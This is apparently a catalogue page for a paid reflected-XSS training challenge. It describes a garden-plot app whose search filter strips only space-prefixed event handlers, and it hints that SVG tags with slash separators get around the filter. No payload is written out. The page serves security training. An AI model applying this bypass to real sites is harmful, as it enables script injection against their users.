mediumReflected XSSPro

Banyan

A community-garden app strips event handlers after a space. Only after a space.

The Scenario

Banyan coordinates community-garden plots. The search endpoint strips any space-prefixed on* attribute. The developer assumed all attribute boundaries are whitespace. HTML does not agree.

Challenge Intel

Synopsis

SVG loads JS. The filter only blocks ` on*=` with a leading space.

What It Is

A Sinatra garden-plot app with an overly-confident regex on its search input.

Who It's For

Someone ready to see SVG as a scripting-capable tag.

Skills You'll Practice

SVG-based XSS
Slash as HTML attribute separator
Reading regex boundaries carefully

What You'll Gain

Knowledge that HTML accepts several non-space characters between tag name and attributes
Another filter-bypass pattern in the toolkit

Ready to hack Banyan?

Upgrade to Pro to unlock this challenge and the full library.

View Pro Plans